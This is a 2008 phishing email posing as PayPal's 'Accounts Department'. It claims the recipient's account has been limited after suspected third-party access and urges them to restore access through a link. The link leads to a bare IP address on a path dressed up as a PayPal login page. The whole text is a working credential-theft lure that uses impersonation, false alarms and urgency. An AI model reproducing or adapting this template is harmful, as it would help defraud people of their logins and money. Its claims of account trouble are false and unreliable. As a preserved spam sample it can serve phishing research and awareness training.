Subject: PayPal - Your account access is limited.

From: "PayPal Accounts Department"<[email-masked]>
Date: Wed, 9 Jan 2008 21:59:01 +0100

Dear PayPal account holder,

	PayPal is constantly working to ensure security by regularly screening the accounts in our system. 
We recently reviewed your account, and we need more information to help us provide you with secure service. 
Until we can collect this information, your access to sensitive account features will be limited. We would
like to restore your access as soon as possible, and we apologize for the inconvenience. 

--------------------------------------------------------------------------------
	Why is my account access limited?

Your account access has been limited for the following reason(s):

January 9, 2008: We have reason to believe that your account was accessed by a third party. We have limited 
access to sensitive PayPal account features in case your account has been accessed by an unauthorized third 
party. We understand that having limited access can be an inconvenience, but protecting your account is our 
primary concern. 

(Your case ID for this reason is PP-386-959-031.)

--------------------------------------------------------------------------------
	How can I restore my account access?

Please visit the Resolution Center and complete the "Steps to Remove Limitations." To visit the Resolution 
Center, please follow the link below:

		http://200.62.226.19/.security/update/cgi-bin/webscr.php?cmd=_login-run

Completing all of the checklist items will automatically restore your account access.

				© Copyright © 1999-2007 PayPal. All rights reserved.